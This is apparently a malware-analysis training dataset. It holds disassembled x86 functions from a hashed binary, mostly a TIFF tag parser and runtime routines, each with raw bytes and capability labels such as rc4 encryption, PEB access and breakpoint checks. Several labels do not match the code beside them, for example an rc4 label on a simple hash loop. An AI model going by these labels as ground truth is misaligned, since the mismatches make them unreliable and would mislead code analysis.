"mov dword [ebp - 0x20], eax",
"cmp eax, 1",
"jb 0x486d10",
"sub eax, 0xa",
"jbe 0x486d84",
"sub eax, 0x7ff4",
"je 0x486d84",
"sub eax, 5",
"je 0x486d84",
"sub eax, 2",
"je 0x486d84",
"sub eax, 0x24",
"je 0x486d84",
"sub eax, 0x56",
"jb 0x486d10",
"sub eax, 3",
"jbe 0x486d84",
"sub eax, 0xa",
"jb 0x486d10",
"sub eax, 1",
"jbe 0x486d84",
"sub eax, 0x25",
"jb 0x486d10",
"sub eax, 1",
"jbe 0x486d84",
"sub eax, 0x6b2",
"je 0x486d84",
"sub eax, 0xf",
"jb 0x486d10",
"sub eax, 1",
"jbe 0x486d84",
"sub eax, 0x23",
"jne 0x486d10",
"nop",
"jmp 0x486d84",
"lea eax, [ebp - 0x150]",
"call fcn.00403b00",
"push 0",
"mov eax, dword [ebp - 0x20]",
"xor edx, edx",
"mov dword [ebp - 0x50], eax",
"mov dword [ebp - 0x4c], edx",
"push dword [ebp - 0x4c]",
"push dword [ebp - 0x50]",
"mov ecx, 0xff",
"lea edx, [ebp - 0x250]",
"mov eax, 0xffffffff",
"call fcn.00404eb0",
"lea ecx, [ebp - 0x34]",
"xor dx, dx",
"lea eax, [ebp - 0x250]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x34]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x34]",
"mov edx, str.expected_Compression__but_found",
"lea eax, [ebp - 0x150]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"mov esi, esi",
"mov eax, dword [ebp - 8]",
"mov edx, dword [ebp - 0x20]",
"mov dword [eax + 0x24], edx",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov dword [ebp - 0x20], eax",
"cmp eax, 0xffff",
"jbe 0x486e28",
"lea eax, [ebp - 0x150]",
"call fcn.00403b00",
"push 0",
"mov eax, dword [ebp - 0x20]",
"xor edx, edx",
"mov dword [ebp - 0x158], eax",
"mov dword [ebp - 0x154], edx",
"push dword [ebp - 0x154]",
"push dword [ebp - 0x158]",
"mov ecx, 0xff",
"lea edx, [ebp - 0x148]",
"mov eax, 0xffffffff",
"call fcn.00404eb0",
"lea ecx, [ebp - 0x34]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x34]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x34]",
"mov edx, str.expected_PhotometricInterpretation__but_found",
"lea eax, [ebp - 0x150]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"mov eax, dword [ebp - 8]",
"mov edx, dword [ebp - 0x20]",
"mov dword [eax + 0x68], edx",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov dword [ebp - 0x20], eax",
"cmp eax, 1",
"jb 0x486e80",
"sub eax, 1",
"je 0x486f00",
"sub eax, 1",
"je 0x486f00",
"sub eax, 1",
"je 0x486f00",
"jmp 0x486e80",
"lea eax, [ebp - 0x150]",
"call fcn.00403b00",
"push 0",
"mov eax, dword [ebp - 0x20]",
"xor edx, edx",
"mov dword [ebp - 0x158], eax",
"mov dword [ebp - 0x154], edx",
"push dword [ebp - 0x154]",
"push dword [ebp - 0x158]",
"mov ecx, 0xff",
"lea edx, [ebp - 0x148]",
"mov eax, 0xffffffff",
"call fcn.00404eb0",
"lea ecx, [ebp - 0x34]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x34]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x34]",
"mov edx, str.expected_Tresholding__but_found",
"lea eax, [ebp - 0x150]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"mov esi, esi",
"mov eax, dword [ebp - 8]",
"mov edx, dword [ebp - 0x20]",
"mov dword [eax + 0x98], edx",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x1c], eax",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x18], eax",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov dword [ebp - 0x20], eax",
"cmp eax, 1",
"jb 0x486f78",
"sub eax, 1",
"je 0x486f58",
"sub eax, 1",
"je 0x486f68",
"jmp 0x486f78",
"mov eax, dword [ebp - 8]",
"mov dword [eax + 0x3c], 1",
"jmp 0x4878fc",
"mov eax, dword [ebp - 8]",
"mov dword [eax + 0x3c], 2",
"jmp 0x4878fc",
"lea eax, [ebp - 0x150]",
"call fcn.00403b00",
"push 0",
"mov eax, dword [ebp - 0x20]",
"xor edx, edx",
"mov dword [ebp - 0x158], eax",
"mov dword [ebp - 0x154], edx",
"push dword [ebp - 0x154]",
"push dword [ebp - 0x158]",
"mov ecx, 0xff",
"lea edx, [ebp - 0x148]",
"mov eax, 0xffffffff",
"call fcn.00404eb0",
"lea ecx, [ebp - 0x34]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x34]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x34]",
"mov edx, str.expected_FillOrder__but_found",
"lea eax, [ebp - 0x150]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"mov esi, esi",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"lea edx, [ebp - 0x150]",
"call fcn.00487f50",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 8]",
"add eax, 0x34",
"call fcn.004089c0",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"lea edx, [ebp - 0x150]",
"call fcn.00487f50",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 8]",
"add eax, 0x44",
"call fcn.004089c0",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"lea edx, [ebp - 0x150]",
"call fcn.00487f50",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 8]",
"add eax, 0x54",
"call fcn.004089c0",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"lea edx, [ebp - 0x150]",
"call fcn.00487f50",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 8]",
"add eax, 0x58",
"call fcn.004089c0",
"jmp 0x4878fc",
"mov eax, ebp",
"call fcn.00487920",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x84], eax",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov dword [ebp - 0x20], eax",
"cmp eax, 1",
"jb 0x487148",
"sub eax, 1",
"je 0x4871c8",
"sub eax, 1",
"je 0x4871c8",
"sub eax, 1",
"je 0x4871c8",
"sub eax, 1",
"je 0x4871c8",
"sub eax, 1",
"je 0x4871c8",
"sub eax, 1",
"je 0x4871c8",
"sub eax, 1",
"je 0x4871c8",
"sub eax, 1",
"je 0x4871c8",
"jmp 0x487148",
"lea eax, [ebp - 0x150]",
"call fcn.00403b00",
"push 0",
"mov edx, dword [ebp - 0x20]",
"xor eax, eax",
"mov dword [ebp - 0x158], edx",
"mov dword [ebp - 0x154], eax",
"push dword [ebp - 0x154]",
"push dword [ebp - 0x158]",
"mov ecx, 0xff",
"lea edx, [ebp - 0x148]",
"mov eax, 0xffffffff",
"call fcn.00404eb0",
"lea ecx, [ebp - 0x34]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x34]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x34]",
"mov edx, str.expected_Orientation__but_found",
"lea eax, [ebp - 0x150]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"mov esi, esi",
"mov eax, dword [ebp - 8]",
"mov edx, dword [ebp - 0x20]",
"mov dword [eax + 0x5c], edx",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x78], eax",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov dword [ebp - 0x20], eax",
"test eax, eax",
"jne 0x487280",
"lea eax, [ebp - 0x150]",
"call fcn.00403b00",
"push 0",
"mov eax, dword [ebp - 0x20]",
"xor edx, edx",
"mov dword [ebp - 0x158], eax",
"mov dword [ebp - 0x154], edx",
"push dword [ebp - 0x154]",
"push dword [ebp - 0x158]",
"mov ecx, 0xff",
"lea edx, [ebp - 0x148]",
"mov eax, 0xffffffff",
"call fcn.00404eb0",
"lea ecx, [ebp - 0x34]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x34]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x34]",
"mov edx, str.expected_RowsPerStrip__but_found",
"lea eax, [ebp - 0x150]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"lea esi, [esi]",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0x20]",
"mov dword [edx + 0x74], eax",
"jmp 0x4878fc",
"mov eax, ebp",
"call fcn.00487920",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x80], eax",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"lea edx, [ebp - 0x3c]",
"call fcn.00487d40",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0x3c]",
"mov dword [edx + 0x9c], eax",
"mov eax, dword [ebp - 0x38]",
"mov dword [edx + 0xa0], eax",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"lea edx, [ebp - 0x3c]",
"call fcn.00487d40",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0x3c]",
"mov dword [edx + 0xa4], eax",
"mov eax, dword [ebp - 0x38]",
"mov dword [edx + 0xa8], eax",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487b30",
"mov dword [ebp - 0x24], eax",
"cmp eax, 1",
"jl 0x487334",
"sub eax, 1",
"je 0x487398",
"sub eax, 1",
"je 0x487398",
"jmp 0x487334",
"lea eax, [ebp - 0x150]",
"call fcn.00403b00",
"push 0",
"push 0xff",
"mov eax, dword [ebp - 0x24]",
"lea ecx, [ebp - 0x250]",
"mov edx, 0xffffffff",
"call fcn.00404dd0",
"lea ecx, [ebp - 0x34]",
"xor dx, dx",
"lea eax, [ebp - 0x250]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x34]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x34]",
"mov edx, str.expected_PlanarConfiguration__but_found",
"lea eax, [ebp - 0x150]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"mov eax, dword [ebp - 8]",
"mov edx, dword [ebp - 0x24]",
"mov dword [eax + 0x6c], edx",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"lea edx, [ebp - 0x150]",
"call fcn.00487f50",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 8]",
"add eax, 0x64",
"call fcn.004089c0",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov dword [ebp - 0x20], eax",
"cmp eax, 1",
"jb 0x487440",
"sub eax, 1",
"je 0x487410",
"sub eax, 1",
"je 0x487420",
"sub eax, 1",
"je 0x487430",
"jmp 0x487440",
"mov eax, dword [ebp - 8]",
"mov dword [eax + 0x70], 1",
"jmp 0x4878fc",
"mov eax, dword [ebp - 8]",
"mov dword [eax + 0x70], 2",
"jmp 0x4878fc",
"mov eax, dword [ebp - 8]",
"mov dword [eax + 0x70], 3",
"jmp 0x4878fc",
"lea eax, [ebp - 0x150]",
"call fcn.00403b00",
"push 0",
"mov eax, dword [ebp - 0x20]",
"xor edx, edx",
"mov dword [ebp - 0x158], eax",
"mov dword [ebp - 0x154], edx",
"push dword [ebp - 0x154]",
"push dword [ebp - 0x158]",
"mov ecx, 0xff",
"lea edx, [ebp - 0x148]",
"mov eax, 0xffffffff",
"call fcn.00404eb0",
"lea ecx, [ebp - 0x34]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x34]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x34]",
"mov edx, str.expected_ResolutionUnit__but_found",
"lea eax, [ebp - 0x150]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"mov esi, esi",
"jmp 0x4878fc",
"mov eax, ebp",
"call fcn.00487920",
"mov dword [ebp - 0x20], eax",
"lea eax, [ebp - 0x2c]",
"push eax",
"lea ecx, [ebp - 0x28]",
"mov edx, dword [ebp - 0x20]",
"mov eax, dword [ebp - 0xc]",
"call fcn.004885c0",
"xor eax, eax",
"push fcn.00486610",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"cmp dword [ebp - 0x2c], 2",
"je 0x487580",
"lea eax, [ebp - 0x150]",
"call fcn.00403b00",
"push 0",
"mov eax, dword [ebp - 0x2c]",
"xor edx, edx",
"mov dword [ebp - 0x158], eax",
"mov dword [ebp - 0x154], edx",
"push dword [ebp - 0x154]",
"push dword [ebp - 0x158]",
"mov ecx, 0xff",
"lea edx, [ebp - 0x148]",
"mov eax, 0xffffffff",
"call fcn.00404eb0",
"lea ecx, [ebp - 0x34]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x34]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x34]",
"mov edx, str.PageNumber_Count2_expected__but_found",
"lea eax, [ebp - 0x150]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"nop",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0x28]",
"mov ax, word [eax]",
"mov word [edx + 0x60], ax",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0x28]",
"mov ax, word [eax + 2]",
"mov word [edx + 0x62], ax",
"mov eax, dword [ebp - 8]",
"mov dx, word [eax + 0x60]",
"cmp dx, word [eax + 0x62]",
"jb 0x4875c8",
"mov eax, dword [ebp - 8]",
"movzx eax, word [eax + 0x60]",
"mov dword [ebp - 0x20], eax",
"mov edx, dword [ebp - 8]",
"mov ax, word [edx + 0x62]",
"mov word [edx + 0x60], ax",
"mov eax, dword [ebp - 8]",
"mov dx, word [ebp - 0x20]",
"mov word [eax + 0x62], dx",
"xor edx, edx",
"pop eax",
"add esp, 0xc",
"mov dword fs:[edx], eax",
"mov eax, ebp",
"call fcn.00486610",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"lea edx, [ebp - 0x150]",
"call fcn.00487f50",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 8]",
"add eax, 0x7c",
"call fcn.004089c0",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"lea edx, [ebp - 0x150]",
"call fcn.00487f50",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 8]",
"add eax, 0x30",
"call fcn.004089c0",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"lea edx, [ebp - 0x150]",
"call fcn.00487f50",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 8]",
"add eax, 0xc",
"call fcn.004089c0",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"lea edx, [ebp - 0x150]",
"call fcn.00487f50",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 8]",
"add eax, 0x40",
"call fcn.004089c0",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"and eax, 0xffff",
"mov dword [ebp - 0x20], eax",
"cmp eax, 1",
"jb 0x4876ac",
"sub eax, 1",
"je 0x48772c",
"sub eax, 1",
"je 0x48772c",
"jmp 0x4876ac",
"lea eax, [ebp - 0x150]",
"call fcn.00403b00",
"push 0",
"mov edx, dword [ebp - 0x20]",
"xor eax, eax",
"mov dword [ebp - 0x158], edx",
"mov dword [ebp - 0x154], eax",
"push dword [ebp - 0x154]",
"push dword [ebp - 0x158]",
"mov ecx, 0xff",
"lea edx, [ebp - 0x148]",
"mov eax, 0xffffffff",
"call fcn.00404eb0",
"lea ecx, [ebp - 0x34]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x34]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x34]",
"mov edx, str.expected_Predictor__but_found",
"lea eax, [ebp - 0x150]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"mov esi, esi",
"mov edx, dword [ebp - 8]",
"mov ax, word [ebp - 0x20]",
"mov word [edx + 0x28], ax",
"jmp 0x4878fc",
"mov eax, ebp",
"call fcn.00487920",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x20], eax",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x88], eax",
"mov eax, dword [ebp - 8]",
"cmp dword [eax + 0x88], 0",
"jne 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"mov edx, str.TileWidth0",
"call fcn.00484dc0",
"mov esi, esi",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x8c], eax",
"mov eax, dword [ebp - 8]",
"cmp dword [eax + 0x8c], 0",
"jne 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"mov edx, str.TileLength0",
"call fcn.00484dc0",
"mov esi, esi",
"jmp 0x4878fc",
"mov eax, ebp",
"call fcn.00487920",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x90], eax",
"mov eax, dword [ebp - 8]",
"cmp dword [eax + 0x90], 0",
"jne 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"mov edx, str.TileOffsets0",
"call fcn.00484dc0",
"lea esi, [esi]",
"jmp 0x4878fc",
"mov eax, ebp",
"call fcn.00487920",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x94], eax",
"mov eax, dword [ebp - 8]",
"cmp dword [eax + 0x94], 0",
"jne 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"mov edx, str.TileByteCounts0",
"call fcn.00484dc0",
"lea esi, [esi]",
"jmp 0x4878fc",
"mov eax, ebp",
"call fcn.00487920",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x38], eax",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"lea edx, [ebp - 0x150]",
"call fcn.00487f50",
"mov edx, dword [ebp - 0x150]",
"mov eax, dword [ebp - 8]",
"add eax, 0x2c",
"call fcn.004089c0",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.004880c0",
"mov word [ebp - 0x10], ax",
"mov eax, dword [ebp - 0xc]",
"call fcn.004880f0",
"mov dword [ebp - 0x14], eax",
"mov eax, dword [ebp - 0xc]",
"call fcn.004880f0",
"mov dword [ebp - 0x18], eax",
"cmp word [ebp - 0x10], 0",
"jne 0x4878fc",
"cmp dword [ebp - 0x14], 0",
"jne 0x4878fc",
"cmp dword [ebp - 0x18], 0",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00486620",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x48dcc0
|
[
"Encode data using xor"
] |
5356578d71ff85f67c2abfffffffff9083c70188c1320a81e1ff00000089cb89c1c1e908330c9d00625d0089c883c20139fe7fdc5f5e5bc3
|
[
"push ebx",
"push esi",
"push edi",
"lea esi, [ecx - 1]",
"test esi, esi",
"jl 0x48dcf4",
"mov edi, 0xffffffff",
"nop",
"add edi, 1",
"mov cl, al",
"xor cl, byte [edx]",
"and ecx, 0xff",
"mov ebx, ecx",
"mov ecx, eax",
"shr ecx, 8",
"xor ecx, dword [ebx*4 + 0x5d6200]",
"mov eax, ecx",
"add edx, 1",
"cmp esi, edi",
"jg 0x48dcd0",
"pop edi",
"pop esi",
"pop ebx",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4ad130
|
[
"Encrypt data using rc4 prga"
] |
535689c231c08d5a010fb60a83c10181e1ff00000001caeb1889c1c1e10529c10fb63331f189c883c30139da77eb5e5bc3
|
[
"push ebx",
"push esi",
"mov edx, eax",
"xor eax, eax",
"lea ebx, [edx + 1]",
"movzx ecx, byte [edx]",
"add ecx, 1",
"and ecx, 0xff",
"add edx, ecx",
"jmp 0x4ad161",
"mov ecx, eax",
"shl ecx, 5",
"sub ecx, eax",
"movzx esi, byte [ebx]",
"xor ecx, esi",
"mov eax, ecx",
"add ebx, 1",
"cmp edx, ebx",
"ja 0x4ad150",
"pop esi",
"pop ebx",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4ae940
|
[
"Access peb ldr_data"
] |
5589e58d6424f45356578945f88955fc83fa01750f8b45f88b55f8ff52348945f88d7600837df8000f84bc00000089f631c0680bea4a0055682046410064ff30648920c745f4ffffffff8b45f831d2e82ce5f5ff8b45f8c6400c008b45f8c6400e00ba01000000b8e8985800e87f84f8ff8b55f88942108b45f8e8010200008b55f88942288b45f8e8630200008b55f88942388b45f8e8c50200008b55f8894230c745f401000000837df8007412837dfc00740c8b45f88b55f88b12ff52449031d25883c40c648902eb1f8b45f85f5e5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0xc]",
"push ebx",
"push esi",
"push edi",
"mov dword [ebp - 8], eax",
"mov dword [ebp - 4], edx",
"cmp edx, 1",
"jne 0x4ae964",
"mov eax, dword [ebp - 8]",
"mov edx, dword [ebp - 8]",
"call dword [edx + 0x34]",
"mov dword [ebp - 8], eax",
"lea esi, [esi]",
"cmp dword [ebp - 8], 0",
"je 0x4aea2a",
"mov esi, esi",
"xor eax, eax",
"push 0x4aea0b",
"push ebp",
"push 0x414620",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov dword [ebp - 0xc], 0xffffffff",
"mov eax, dword [ebp - 8]",
"xor edx, edx",
"call fcn.0040cec0",
"mov eax, dword [ebp - 8]",
"mov byte [eax + 0xc], 0",
"mov eax, dword [ebp - 8]",
"mov byte [eax + 0xe], 0",
"mov edx, 1",
"mov eax, 0x5898e8",
"call fcn.00436e30",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x10], eax",
"mov eax, dword [ebp - 8]",
"call fcn.004aebc0",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x28], eax",
"mov eax, dword [ebp - 8]",
"call fcn.004aec30",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x38], eax",
"mov eax, dword [ebp - 8]",
"call fcn.004aeca0",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x30], eax",
"mov dword [ebp - 0xc], 1",
"cmp dword [ebp - 8], 0",
"je 0x4aea00",
"cmp dword [ebp - 4], 0",
"je 0x4aea00",
"mov eax, dword [ebp - 8]",
"mov edx, dword [ebp - 8]",
"mov edx, dword [edx]",
"call dword [edx + 0x44]",
"nop",
"xor edx, edx",
"pop eax",
"add esp, 0xc",
"mov dword fs:[edx], eax",
"jmp 0x4aea2a",
"mov eax, dword [ebp - 8]",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4b75f0
|
[
"Extract resource via kernel32 functions"
] |
5589e58d6424f05356578945f48955f8894dfc837df8017402eb0d8b45f48b55f4ff52348945f490837df4007402eb08e9b100000031c068b3764b0055682046410064ff30648920c745f0ffffffffff7508ff75fce8639ef4ff8b55f48942148b45f4837814007502eb26ff7508ff75fce8579ef4ff89c38b45f4ff7014e85a9ef4ff89c28b45f489d9e80ed9f7ff89f6c745f001000000837df4007502eb15837df8007502eb0d8b45f48b55f48b12ff524489f631d25883c40c648902eb238b45f45f5e5b89ec5dc20400
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x10]",
"push ebx",
"push esi",
"push edi",
"mov dword [ebp - 0xc], eax",
"mov dword [ebp - 8], edx",
"mov dword [ebp - 4], ecx",
"cmp dword [ebp - 8], 1",
"je 0x4b760b",
"jmp 0x4b7618",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0xc]",
"call dword [edx + 0x34]",
"mov dword [ebp - 0xc], eax",
"nop",
"cmp dword [ebp - 0xc], 0",
"je 0x4b7620",
"jmp 0x4b7628",
"jmp 0x4b76d6",
"xor eax, eax",
"push 0x4b76b3",
"push ebp",
"push 0x414620",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov dword [ebp - 0x10], 0xffffffff",
"push dword [ebp + 8]",
"push dword [ebp - 4]",
"call sub.kernel32.dll_LoadResource",
"mov edx, dword [ebp - 0xc]",
"mov dword [edx + 0x14], eax",
"mov eax, dword [ebp - 0xc]",
"cmp dword [eax + 0x14], 0",
"jne 0x4b765e",
"jmp 0x4b7684",
"push dword [ebp + 8]",
"push dword [ebp - 4]",
"call sub.kernel32.dll_SizeofResource",
"mov ebx, eax",
"mov eax, dword [ebp - 0xc]",
"push dword [eax + 0x14]",
"call sub.kernel32.dll_LockResource",
"mov edx, eax",
"mov eax, dword [ebp - 0xc]",
"mov ecx, ebx",
"call fcn.00434f90",
"mov esi, esi",
"mov dword [ebp - 0x10], 1",
"cmp dword [ebp - 0xc], 0",
"jne 0x4b7693",
"jmp 0x4b76a8",
"cmp dword [ebp - 8], 0",
"jne 0x4b769b",
"jmp 0x4b76a8",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0xc]",
"mov edx, dword [edx]",
"call dword [edx + 0x44]",
"mov esi, esi",
"xor edx, edx",
"pop eax",
"add esp, 0xc",
"mov dword fs:[edx], eax",
"jmp 0x4b76d6",
"mov eax, dword [ebp - 0xc]",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret 4"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4b9440
|
[
"Check for software breakpoints"
] |
53565789c6817e14ca000000752689f0e86b450000807e40007411c74614cf000000b301e9bc000000c74614cb00000090817e14cb0000000f85830000008b8684010000807810000f846b0000008db42600000000837e0800740a89f08b5608ff128d760089f08b9684010000ff1289c785ff750830dbe96600000083ff0274358d7600837e080074ca83ff03740583ff0175c08b4608834004018b46088b50043b50087cae8b56088b861001000001420889f6eb9e89f68b4670894678eb18817e14cc000000740f8b4e1489f0b214e8470300008d760089f0e80d00000088c388d85f5e5bc3
|
[
"push ebx",
"push esi",
"push edi",
"mov esi, eax",
"cmp dword [esi + 0x14], 0xca",
"jne 0x4b9474",
"mov eax, esi",
"call fcn.004bd9c0",
"cmp byte [esi + 0x40], 0",
"je 0x4b946c",
"mov dword [esi + 0x14], 0xcf",
"mov bl, 1",
"jmp 0x4b9525",
"mov dword [esi + 0x14], 0xcb",
"nop",
"cmp dword [esi + 0x14], 0xcb",
"jne 0x4b9504",
"mov eax, dword [esi + 0x184]",
"cmp byte [eax + 0x10], 0",
"je 0x4b94fc",
"lea esi, [esi]",
"cmp dword [esi + 8], 0",
"je 0x4b94a8",
"mov eax, esi",
"mov edx, dword [esi + 8]",
"call dword [edx]",
"lea esi, [esi]",
"mov eax, esi",
"mov edx, dword [esi + 0x184]",
"call dword [edx]",
"mov edi, eax",
"test edi, edi",
"jne 0x4b94c0",
"xor bl, bl",
"jmp 0x4b9525",
"cmp edi, 2",
"je 0x4b94fa",
"lea esi, [esi]",
"cmp dword [esi + 8], 0",
"je 0x4b9498",
"cmp edi, 3",
"je 0x4b94d8",
"cmp edi, 1",
"jne 0x4b9498",
"mov eax, dword [esi + 8]",
"add dword [eax + 4], 1",
"mov eax, dword [esi + 8]",
"mov edx, dword [eax + 4]",
"cmp edx, dword [eax + 8]",
"jl 0x4b9498",
"mov edx, dword [esi + 8]",
"mov eax, dword [esi + 0x110]",
"add dword [edx + 8], eax",
"mov esi, esi",
"jmp 0x4b9498",
"mov esi, esi",
"mov eax, dword [esi + 0x70]",
"mov dword [esi + 0x78], eax",
"jmp 0x4b951c",
"cmp dword [esi + 0x14], 0xcc",
"je 0x4b951c",
"mov ecx, dword [esi + 0x14]",
